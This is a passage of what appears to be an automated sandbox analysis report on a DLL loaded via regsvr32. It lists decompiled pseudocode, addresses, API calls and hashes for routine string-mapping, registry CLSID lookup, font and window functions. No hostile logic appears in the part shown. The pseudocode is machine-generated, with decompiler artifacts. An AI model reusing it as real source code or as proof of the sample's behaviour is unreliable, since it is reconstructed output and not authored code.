					L11:
					_t119 =  *0x1004f73c; // 0x1
					if(_t119 == 2 || _t119 == 0) {
						 *(_t192 - 0x28) = 0;
						_t183 = 0;
						 *(_t192 - 0x3c) = 0;
						__eflags =  *(_t192 + 8);
						if( *(_t192 + 8) == 0) {
							_t138 =  *0x1004f724; // 0x0
							 *(_t192 + 8) = _t138;
						}
						__eflags =  *(_t192 + 0x20);
						if( *(_t192 + 0x20) == 0) {
							_t137 =  *0x1004f734; // 0x0
							 *(_t192 + 0x20) = _t137;
						}
						_t120 = E1001A444(0,  *(_t192 + 8));
						 *((intOrPtr*)(_t192 - 0x40)) = _t120;
						__eflags = _t120 - 0xffffffff;
						if(_t120 != 0xffffffff) {
							__eflags = _t120 -  *(_t192 + 0x20);
							if(__eflags == 0) {
								_t186 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 + 0x10),  *(_t192 + 0x14),  *(_t192 + 0x18),  *(_t192 + 0x1c));
								L61:
								__eflags =  *(_t192 - 0x28);
								if(__eflags != 0) {
									_push( *(_t192 - 0x28));
									E100107C8(0, _t183, _t186, __eflags);
								}
								_t122 = _t186;
								goto L64;
							}
							_push(0);
							_push(0);
							_t175 = _t192 + 0x14;
							_push(_t192 + 0x14);
							_push( *(_t192 + 0x10));
							_push(_t120);
							_push( *(_t192 + 0x20));
							_t125 = E1001A487(0, _t183, _t185, __eflags);
							_t195 =  &(_t193[0xc]);
							 *(_t192 - 0x28) = _t125;
							__eflags = _t125;
							if(_t125 == 0) {
								goto L46;
							}
							_t187 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc), _t125,  *(_t192 + 0x14), 0, 0);
							 *(_t192 - 0x24) = _t187;
							__eflags = _t187;
							if(_t187 == 0) {
								_t186 =  *(_t192 - 0x48);
								L58:
								__eflags =  *(_t192 - 0x3c);
								if(__eflags != 0) {
									_push(_t183);
									E100107C8(0, _t183, _t186, __eflags);
								}
								goto L61;
							}
							 *(_t192 - 4) = 0;
							E10010B20(_t126 + 0x00000003 & 0xfffffffc, _t175);
							 *(_t192 - 0x18) = _t195;
							_t183 = _t195;
							 *(_t192 - 0x44) = _t183;
							E10011C50(_t183, 0, _t187);
							_t196 =  &(_t195[0xc]);
							 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
							__eflags = _t183;
							if(_t183 != 0) {
								L54:
								_t132 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x28),  *(_t192 + 0x14), _t183,  *(_t192 - 0x24));
								 *(_t192 - 0x24) = _t132;
								__eflags = _t132;
								if(__eflags != 0) {
									_push( *(_t192 + 0x1c));
									_push( *(_t192 + 0x18));
									_push(_t192 - 0x24);
									_push(_t183);
									_push( *(_t192 + 0x20));
									_push( *((intOrPtr*)(_t192 - 0x40)));
									_t134 = E1001A487(0, _t183, _t187, __eflags);
									asm("sbb esi, esi");
									_t186 =  ~( ~_t134);
									goto L58;
								}
								goto L55;
							} else {
								_t183 = E100107B6( *(_t192 - 0x24));
								__eflags = _t183;
								if(_t183 == 0) {
									L55:
									_t186 = 0;
									goto L58;
								}
								E10011C50(_t183, 0,  *(_t192 - 0x24));
								_t196 =  &(_t196[0xc]);
								 *(_t192 - 0x3c) = 1;
								goto L54;
							}
						} else {
							goto L46;
						}
					} else {
						if(_t119 != 1) {
							L46:
							_t122 = 0;
							L64:
							return E1001254F(_t122);
						}
						_t184 = 0;
						 *(_t192 - 0x2c) = 0;
						 *(_t192 - 0x38) = 0;
						 *(_t192 - 0x34) = 0;
						if( *(_t192 + 0x20) == 0) {
							_t164 =  *0x1004f734; // 0x0
							 *(_t192 + 0x20) = _t164;
						}
						_t190 = MultiByteToWideChar( *(_t192 + 0x20), 1 + (0 |  *((intOrPtr*)(_t192 + 0x24)) != 0x00000000) * 8,  *(_t192 + 0x10),  *(_t192 + 0x14), 0, 0);
						 *(_t192 - 0x30) = _t190;
						if(_t190 == 0) {
							goto L46;
						} else {
							 *(_t192 - 4) = 1;
							E10010B20(_t190 + _t190 + 0x00000003 & 0xfffffffc, _t172);
							 *(_t192 - 0x18) = _t193;
							 *(_t192 - 0x1c) = _t193;
							 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
							if( *(_t192 - 0x1c) != 0) {
								L21:
								if(MultiByteToWideChar( *(_t192 + 0x20), 1,  *(_t192 + 0x10),  *(_t192 + 0x14),  *(_t192 - 0x1c), _t190) == 0) {
									L36:
									_t219 =  *(_t192 - 0x34);
									if( *(_t192 - 0x34) != 0) {
										_push( *(_t192 - 0x20));
										E100107C8(0, _t184, _t190, _t219);
									}
									_t220 =  *(_t192 - 0x38);
									if( *(_t192 - 0x38) != 0) {
										_push( *(_t192 - 0x1c));
										E100107C8(0, _t184, _t190, _t220);
									}
									_t122 = _t184;
									goto L64;
								}
								_t184 = LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190, 0, 0);
								 *(_t192 - 0x2c) = _t184;
								if(_t184 == 0) {
									goto L36;
								}
								if(( *(_t192 + 0xd) & 0x00000004) == 0) {
									 *(_t192 - 4) = 2;
									E10010B20(_t184 + _t184 + 0x00000003 & 0xfffffffc, _t172);
									 *(_t192 - 0x18) = _t193;
									 *(_t192 - 0x20) = _t193;
									 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
									__eflags =  *(_t192 - 0x20);
									if( *(_t192 - 0x20) != 0) {
										L31:
										__eflags = LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190,  *(_t192 - 0x20), _t184);
										if(__eflags != 0) {
											_push(0);
											_push(0);
											__eflags =  *(_t192 + 0x1c);
											if(__eflags != 0) {
												_push( *(_t192 + 0x1c));
												_push( *(_t192 + 0x18));
											} else {
												_push(0);
												_push(0);
											}
											_t184 = WideCharToMultiByte( *(_t192 + 0x20), 0,  *(_t192 - 0x20), _t184, ??, ??, ??, ??);
										}
										goto L36;
									} else {
										_t160 = E100107B6(_t184 + _t184);
										 *(_t192 - 0x20) = _t160;
										__eflags = _t160;
										if(__eflags == 0) {
											goto L36;
										}
										 *(_t192 - 0x34) = 1;
										goto L31;
									}
								}
								if( *(_t192 + 0x1c) != 0 && _t184 <=  *(_t192 + 0x1c)) {
									LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190,  *(_t192 + 0x18),  *(_t192 + 0x1c));
								}
								goto L36;
							} else {
								_t163 = E100107B6(_t190 + _t190);
								_pop(_t172);
								 *(_t192 - 0x1c) = _t163;
								if(_t163 == 0) {
									goto L46;
								}
								 *(_t192 - 0x38) = 1;
								goto L21;
							}
						}
					}
				}
				_t181 =  *(_t192 + 0x14);
				_t165 =  *(_t192 + 0x10);
				while(1) {
					_t172 = _t181 - 1;
					if( *_t165 == 0) {
						break;
					}
					_t165 = _t165 + 1;
					if(_t172 != 0) {
						continue;
					}
					_t172 = _t172 | 0xffffffff;
					break;
				}
				 *(_t192 + 0x14) =  *(_t192 + 0x14) + (_t165 | 0xffffffff) - _t172;
				goto L11;
			}




























                                                                        0x10018081
                                                                        0x10018081
                                                                        0x10018083
                                                                        0x10018088
                                                                        0x1001808f
                                                                        0x10018095
                                                                        0x1001809b
                                                                        0x100180b0
                                                                        0x100180ba
                                                                        0x100180c0
                                                                        0x100180c3
                                                                        0x100180c5
                                                                        0x100180c5
                                                                        0x100180b2
                                                                        0x100180b2
                                                                        0x100180b2
                                                                        0x100180b0
                                                                        0x100180d2
                                                                        0x100180ef
                                                                        0x100180ef
                                                                        0x100180f7
                                                                        0x100182d9
                                                                        0x100182dc
                                                                        0x100182de
                                                                        0x100182e1
                                                                        0x100182e4
                                                                        0x100182e6
                                                                        0x100182eb
                                                                        0x100182eb
                                                                        0x100182ee
                                                                        0x100182f1
                                                                        0x100182f3
                                                                        0x100182f8
                                                                        0x100182f8
                                                                        0x100182fe
                                                                        0x10018304
                                                                        0x10018307
                                                                        0x1001830a
                                                                        0x10018313
                                                                        0x10018316
                                                                        0x10018422
                                                                        0x10018424
                                                                        0x10018424
                                                                        0x10018427
                                                                        0x10018429
                                                                        0x1001842c
                                                                        0x10018431
                                                                        0x10018432
                                                                        0x00000000
                                                                        0x10018432
                                                                        0x1001831c
                                                                        0x1001831d
                                                                        0x1001831e
                                                                        0x10018321
                                                                        0x10018322
                                                                        0x10018325
                                                                        0x10018326
                                                                        0x10018329
                                                                        0x1001832e
                                                                        0x10018331
                                                                        0x10018334
                                                                        0x10018336
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001834a
                                                                        0x1001834c
                                                                        0x1001834f
                                                                        0x10018351
                                                                        0x100183f9
                                                                        0x100183fc
                                                                        0x100183fc
                                                                        0x100183ff
                                                                        0x10018401
                                                                        0x10018402
                                                                        0x10018407
                                                                        0x00000000
                                                                        0x100183ff
                                                                        0x10018357
                                                                        0x10018360
                                                                        0x10018365
                                                                        0x10018368
                                                                        0x1001836a
                                                                        0x10018370
                                                                        0x10018375
                                                                        0x1001838a
                                                                        0x1001838e
                                                                        0x10018390
                                                                        0x100183b5
                                                                        0x100183c5
                                                                        0x100183cb
                                                                        0x100183ce
                                                                        0x100183d0
                                                                        0x100183d6
                                                                        0x100183d9
                                                                        0x100183df
                                                                        0x100183e0
                                                                        0x100183e1
                                                                        0x100183e4
                                                                        0x100183e7
                                                                        0x100183f3
                                                                        0x100183f5
                                                                        0x00000000
                                                                        0x100183f5
                                                                        0x00000000
                                                                        0x10018392
                                                                        0x1001839b
                                                                        0x1001839d
                                                                        0x1001839f
                                                                        0x100183d2
                                                                        0x100183d2
                                                                        0x00000000
                                                                        0x100183d2
                                                                        0x100183a6
                                                                        0x100183ab
                                                                        0x100183ae
                                                                        0x00000000
                                                                        0x100183ae
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10018105
                                                                        0x10018108
                                                                        0x1001830c
                                                                        0x1001830c
                                                                        0x10018434
                                                                        0x1001843c
                                                                        0x1001843c
                                                                        0x1001810e
                                                                        0x10018110
                                                                        0x10018113
                                                                        0x10018116
                                                                        0x1001811c
                                                                        0x1001811e
                                                                        0x10018123
                                                                        0x10018123
                                                                        0x10018147
                                                                        0x10018149
                                                                        0x1001814e
                                                                        0x00000000
                                                                        0x10018154
                                                                        0x10018154
                                                                        0x10018164
                                                                        0x10018169
                                                                        0x1001816e
                                                                        0x10018171
                                                                        0x10018195
                                                                        0x100181b3
                                                                        0x100181ca
                                                                        0x100182b6
                                                                        0x100182b6
                                                                        0x100182b9
                                                                        0x100182bb
                                                                        0x100182be
                                                                        0x100182c3
                                                                        0x100182c4
                                                                        0x100182c7
                                                                        0x100182c9
                                                                        0x100182cc
                                                                        0x100182d1
                                                                        0x100182d2
                                                                        0x00000000
                                                                        0x100182d2
                                                                        0x100181e2
                                                                        0x100181e4
                                                                        0x100181e9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100181f3
                                                                        0x10018222
                                                                        0x10018232
                                                                        0x10018237
                                                                        0x1001823c
                                                                        0x1001823f
                                                                        0x10018260
                                                                        0x10018263
                                                                        0x1001827d
                                                                        0x10018291
                                                                        0x10018293
                                                                        0x10018295
                                                                        0x10018296
                                                                        0x10018297
                                                                        0x1001829a
                                                                        0x100182a0
                                                                        0x100182a3
                                                                        0x1001829c
                                                                        0x1001829c
                                                                        0x1001829d
                                                                        0x1001829d
                                                                        0x100182b4
                                                                        0x100182b4
                                                                        0x00000000
                                                                        0x10018265
                                                                        0x10018269
                                                                        0x1001826f
                                                                        0x10018272
                                                                        0x10018274
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10018276
                                                                        0x00000000
                                                                        0x10018276
                                                                        0x10018263
                                                                        0x100181f8
                                                                        0x10018217
                                                                        0x10018217
                                                                        0x00000000
                                                                        0x10018197
                                                                        0x1001819b
                                                                        0x100181a0
                                                                        0x100181a1
                                                                        0x100181a6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100181ac
                                                                        0x00000000
                                                                        0x100181ac
                                                                        0x10018195
                                                                        0x1001814e
                                                                        0x100180f7
                                                                        0x100180d4
                                                                        0x100180d7
                                                                        0x100180da
                                                                        0x100180da
                                                                        0x100180dd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100180df
                                                                        0x100180e2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100180e4
                                                                        0x00000000
                                                                        0x100180e4
                                                                        0x100180ec
                                                                        0x00000000

                                                                        APIs
                                                                        • LCMapStringW.KERNEL32(00000000,00000100,10042704,00000001,00000000,00000000,10042708,00000038,10012971,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 100180A8
                                                                        • GetLastError.KERNEL32 ref: 100180BA
                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,10012C1E,?,00000000,00000000,10042708,00000038,10012971,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 10018141
                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,10012C1E,?,?,00000000), ref: 100181C2
                                                                        • LCMapStringW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 100181DC
                                                                        • LCMapStringW.KERNEL32(00000000,00000000,?,00000000,?,?), ref: 10018217
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: String$ByteCharMultiWide$ErrorLast
                                                                        • String ID:
                                                                        • API String ID: 1775797328-0
                                                                        • Opcode ID: 2a0531d2a3256dac13ccc396c07934314eadd6156838d5e530a716c7ff313fc5
                                                                        • Instruction ID: 011406151073c2933195e68419e397d46f3af982358df5fa752d459d02b2d26b
                                                                        • Opcode Fuzzy Hash: 2a0531d2a3256dac13ccc396c07934314eadd6156838d5e530a716c7ff313fc5
                                                                        • Instruction Fuzzy Hash: 3CB1467280025AEFDF12DFA0DC858DE7BB6FB09394F118229F910AA161D735DBA1DB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1002583A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 68registryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 82%
                                                                        			E1002583A(void* _a4, intOrPtr _a8) {
				void* _v8;
				void* _v12;
				int _v16;
				char* _v20;
				int _v24;
				void* __ebx;
				void* __edi;
				signed int _t35;
				void* _t37;
				void* _t42;
				int* _t43;

				_t43 = 0;
				_v12 = 0;
				_v20 = E100017D0(_a8, 0x104);
				_v16 = 0x104;
				_t42 = RegOpenKeyA;
				_v24 = 0;
				if(RegOpenKeyA(0x80000000, ?str?,  &_v12) == 0) {
					_push(_t37);
					_v8 = 0;
					if(RegOpenKeyA(_v12, _a4,  &_v8) == 0) {
						_a4 = 0;
						if(RegOpenKeyA(_v8, "InProcServer32",  &_a4) == 0) {
							_t35 = RegQueryValueExA(_a4, 0x1003da51, 0,  &_v24, _v20,  &_v16);
							asm("sbb esi, esi");
							_t43 =  ~_t35 + 1;
							RegCloseKey(_a4);
						}
						RegCloseKey(_v8);
					}
					RegCloseKey(_v12);
					_pop(_t37);
				}
				E10006CE2(_t37, _a8, _t42, 0xffffffff);
				return _t43;
			}














                                                                        0x1002584a
                                                                        0x1002584d
                                                                        0x10025855
                                                                        0x10025861
                                                                        0x10025864
                                                                        0x1002586f
                                                                        0x10025876
                                                                        0x10025878
                                                                        0x10025880
                                                                        0x10025890
                                                                        0x1002589e
                                                                        0x100258a5
                                                                        0x100258bb
                                                                        0x100258c8
                                                                        0x100258ca
                                                                        0x100258cb
                                                                        0x100258cb
                                                                        0x100258d0
                                                                        0x100258d0
                                                                        0x100258d5
                                                                        0x100258d7
                                                                        0x100258d7
                                                                        0x100258dd
                                                                        0x100258e7

                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(80000000,CLSID,?), ref: 10025872
                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 10025886
                                                                        • RegOpenKeyA.ADVAPI32(?,InProcServer32,?), ref: 100258A1
                                                                        • RegQueryValueExA.ADVAPI32(?,1003DA51,00000000,?,?,?), ref: 100258BB
                                                                        • RegCloseKey.ADVAPI32(?), ref: 100258CB
                                                                        • RegCloseKey.ADVAPI32(?), ref: 100258D0
                                                                        • RegCloseKey.ADVAPI32(?), ref: 100258D5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: CloseOpen$QueryValue
                                                                        • String ID: CLSID$InProcServer32
                                                                        • API String ID: 3523390698-323508013
                                                                        • Opcode ID: 0f9c6b5e3f4a76f5fb44a6b70cf5269a04b4aae784ef91a0774247bb7487627f
                                                                        • Instruction ID: 98c4733b419a9a9fcc8d3b331f1c0e54a211d8c73680194401ba1897b1518396
                                                                        • Opcode Fuzzy Hash: 0f9c6b5e3f4a76f5fb44a6b70cf5269a04b4aae784ef91a0774247bb7487627f
                                                                        • Instruction Fuzzy Hash: A511297680012DBFEF02EFA5CC80DEEBBB9EF446A0F114122FA05A6150D7719B51DBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10036531 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 60COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E10036531() {
				struct HWND__* _v4;
				void* _v68;
				void* _v76;
				int _t4;
				int _t10;
				struct HDC__* _t15;
				void* _t18;

				_t4 =  *0x1004b8cc; // 0xffffffff
				if(_t4 == 0xffffffff) {
					_t15 = GetDC(0);
					_v4 = 0;
					_t18 = CreateFontA(GetSystemMetrics(0x48), 0, 0, 0, 0x190, 0, 0, 0, 2, 0, 0, 0, 0, "Marlett");
					if(_t18 != 0) {
						_v68 = SelectObject(_t15, _t18);
					}
					GetCharWidthA(_t15, 0x36, 0x36, 0x1004b8cc);
					if(_t18 != 0) {
						SelectObject(_t15, _v76);
						DeleteObject(_t18);
					}
					ReleaseDC(0, _t15);
					_t10 =  *0x1004b8cc; // 0xffffffff
					return _t10;
				}
				return _t4;
			}










                                                                        0x10036532
                                                                        0x1003653a
                                                                        0x10036561
                                                                        0x10036563
                                                                        0x1003657a
                                                                        0x1003657e
                                                                        0x10036584
                                                                        0x10036584
                                                                        0x10036592
                                                                        0x1003659a
                                                                        0x100365a1
                                                                        0x100365a4
                                                                        0x100365a4
                                                                        0x100365ac
                                                                        0x100365b2
                                                                        0x00000000
                                                                        0x100365ba
                                                                        0x100365bc

                                                                        APIs
                                                                        • GetDC.USER32(00000000), ref: 10036543
                                                                        • GetSystemMetrics.USER32 ref: 10036567
                                                                        • CreateFontA.GDI32(00000000,?,?,?,?,?,10036A10,?,?,?,?,?,?,?), ref: 1003656E
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 10036582
                                                                        • GetCharWidthA.GDI32(00000000,00000036,00000036,1004B8CC), ref: 10036592
                                                                        • SelectObject.GDI32(00000000,?), ref: 100365A1
                                                                        • DeleteObject.GDI32(00000000), ref: 100365A4
                                                                        • ReleaseDC.USER32 ref: 100365AC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Object$Select$CharCreateDeleteFontMetricsReleaseSystemWidth
                                                                        • String ID: Marlett
                                                                        • API String ID: 1397664628-3688754224
                                                                        • Opcode ID: 02a284a0c2a362a437aa0b11f12343519aacb4f4528957fd96303176c2f861e5
                                                                        • Instruction ID: 1088ce7175f154466d6028c012866e6bff604f09a65bd199e6d5657c5750c08b
                                                                        • Opcode Fuzzy Hash: 02a284a0c2a362a437aa0b11f12343519aacb4f4528957fd96303176c2f861e5
                                                                        • Instruction Fuzzy Hash: 5D014071542634BFE2269B668C8CD9B7FACEF467E5F104518F209DA152CB614900CBB4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1002F6AD Relevance: 15.1, APIs: 10, Instructions: 96COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E1002F6AD(void* __ecx, int _a4) {
				int _v8;
				struct tagRECT _v24;
				long _t39;
				int _t42;
				int _t43;
				int _t62;
				int _t66;
				void* _t68;
				long _t69;
				int _t71;

				_t69 = _a4;
				_t68 = __ecx;
				_t39 = DefWindowProcA( *(__ecx + 0x1c), 0x46, 0, _t69);
				if(( *(_t69 + 0x18) & 0x00000001) == 0) {
					GetWindowRect( *(_t68 + 0x1c),  &_v24);
					_t42 = _a4;
					_t66 =  *(_t42 + 0x10);
					_t71 = _v24.right - _v24.left;
					_t62 = _v24.bottom - _v24.top;
					_t43 =  *(_t42 + 0x14);
					_v8 = _t66;
					_a4 = _t43;
					if(_t66 != _t71 && ( *(_t68 + 0x7d) & 0x00000004) != 0) {
						SetRect( &_v24, _t66 -  *0x1004efa0, 0, _t66, _t43);
						InvalidateRect( *(_t68 + 0x1c),  &_v24, 1);
						SetRect( &_v24, _t71 -  *0x1004efa0, 0, _t71, _a4);
						InvalidateRect( *(_t68 + 0x1c),  &_v24, 1);
						_t66 = _v8;
						_t43 = _a4;
					}
					if(_t43 != _t62 && ( *(_t68 + 0x7d) & 0x00000008) != 0) {
						SetRect( &_v24, 0, _t43 -  *0x1004efa4, _t66, _t43);
						InvalidateRect( *(_t68 + 0x1c),  &_v24, 1);
						SetRect( &_v24, 0, _t62 -  *0x1004efa4, _v8, _t62);
						_t43 = InvalidateRect( *(_t68 + 0x1c),  &_v24, 1);
					}
					return _t43;
				}
				return _t39;
			}













                                                                        0x1002f6b4
                                                                        0x1002f6bb
                                                                        0x1002f6c2
                                                                        0x1002f6cc
                                                                        0x1002f6da
                                                                        0x1002f6e0
                                                                        0x1002f6e6
                                                                        0x1002f6e9
                                                                        0x1002f6ef
                                                                        0x1002f6f4
                                                                        0x1002f6f7
                                                                        0x1002f6fa
                                                                        0x1002f6fd
                                                                        0x1002f714
                                                                        0x1002f723
                                                                        0x1002f73a
                                                                        0x1002f749
                                                                        0x1002f74f
                                                                        0x1002f752
                                                                        0x1002f752
                                                                        0x1002f757
                                                                        0x1002f774
                                                                        0x1002f77f
                                                                        0x1002f796
                                                                        0x1002f7a1
                                                                        0x1002f7a1
                                                                        0x00000000
                                                                        0x1002f7a7
                                                                        0x1002f7ab

                                                                        APIs
                                                                        • DefWindowProcA.USER32(?,00000046,00000000,?), ref: 1002F6C2
                                                                        • GetWindowRect.USER32 ref: 1002F6DA
                                                                        • SetRect.USER32 ref: 1002F714
                                                                        • InvalidateRect.USER32(?,?,00000001), ref: 1002F723
                                                                        • SetRect.USER32 ref: 1002F73A
                                                                        • InvalidateRect.USER32(?,?,00000001), ref: 1002F749
                                                                        • SetRect.USER32 ref: 1002F774
                                                                        • InvalidateRect.USER32(?,?,00000001), ref: 1002F77F
                                                                        • SetRect.USER32 ref: 1002F796
                                                                        • InvalidateRect.USER32(?,?,00000001), ref: 1002F7A1
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$Invalidate$Window$Proc
                                                                        • String ID:
                                                                        • API String ID: 570070710-0
                                                                        • Opcode ID: c01845c7316c7950b7ef2fd5e5f7f0b699cb6ea0eaa739eb132b7bf5853a6ab6
                                                                        • Instruction ID: 759c21b255db7c4f0b51d9d2c83ad8eda26887521645a94a827a2b7369984522
                                                                        • Opcode Fuzzy Hash: c01845c7316c7950b7ef2fd5e5f7f0b699cb6ea0eaa739eb132b7bf5853a6ab6
                                                                        • Instruction Fuzzy Hash: C631C972900259BFEB01DFA5DD88FAE7BB8EB04344F504125FA01AB5A1D770AE54CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10020B9B Relevance: 15.1, APIs: 10, Instructions: 81stringregistryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E10020B9B() {
				signed int _t39;
				CHAR* _t43;
				int _t44;
				WNDCLASSA* _t63;
				void* _t71;
				void* _t73;

				E10011BF0(0x1003a552, _t71);
				_t63 =  *(_t71 + 8);
				 *((intOrPtr*)(_t71 - 0x10)) = _t73 - 0x38;
				if(GetClassInfoA(_t63->hInstance, _t63->lpszClassName, _t71 - 0x40) == 0) {
					if(RegisterClassA(_t63) == 0) {
						L5:
						_t39 = 0;
					} else {
						 *(_t71 - 0x18) = 1;
						if( *((char*)(E100373B5() + 0x14)) == 0) {
							L10:
							_t39 =  *(_t71 - 0x18);
						} else {
							E10037A1B(1);
							 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
							_t43 = E100373B5() + 0x34;
							 *(_t71 - 0x14) = _t43;
							_t44 = lstrlenA(_t43);
							_t13 = lstrlenA(_t63->lpszClassName) + 2; // 0x2
							if(_t44 + _t13 < 0x1000) {
								 *(_t71 + 8) = lstrlenA( *(_t71 - 0x14));
								if( *(_t71 + 8) + lstrlenA(_t63->lpszClassName) + 2 >= 0x1000) {
									 *(_t71 - 0x18) =  *(_t71 - 0x18) & 0x00000000;
									UnregisterClassA(_t63->lpszClassName, _t63->hInstance);
								} else {
									lstrcatA( *(_t71 - 0x14), _t63->lpszClassName);
									 *(_t71 + 0xa) = 0xa;
									 *((char*)(_t71 + 0xb)) = 0;
									lstrcatA( *(_t71 - 0x14), _t71 + 0xa);
								}
								 *(_t71 - 4) =  *(_t71 - 4) | 0xffffffff;
								E10037A7E(1);
								goto L10;
							} else {
								goto L5;
							}
						}
					}
				} else {
					_t39 = 1;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t71 - 0xc));
				return _t39;
			}









                                                                        0x10020ba0
                                                                        0x10020bab
                                                                        0x10020bae
                                                                        0x10020bc3
                                                                        0x10020bd7
                                                                        0x10020c20
                                                                        0x10020c20
                                                                        0x10020bd9
                                                                        0x10020bdc
                                                                        0x10020be8
                                                                        0x10020c78
                                                                        0x10020c78
                                                                        0x10020bee
                                                                        0x10020bef
                                                                        0x10020bf4
                                                                        0x10020c03
                                                                        0x10020c07
                                                                        0x10020c0a
                                                                        0x10020c13
                                                                        0x10020c1e
                                                                        0x10020c2c
                                                                        0x10020c3a
                                                                        0x10020c60
                                                                        0x10020c67
                                                                        0x10020c3c
                                                                        0x10020c48
                                                                        0x10020c51
                                                                        0x10020c55
                                                                        0x10020c59
                                                                        0x10020c59
                                                                        0x10020c6d
                                                                        0x10020c73
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10020c1e
                                                                        0x10020be8
                                                                        0x10020bc5
                                                                        0x10020bc7
                                                                        0x10020bc7
                                                                        0x10020c80
                                                                        0x10020c89

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
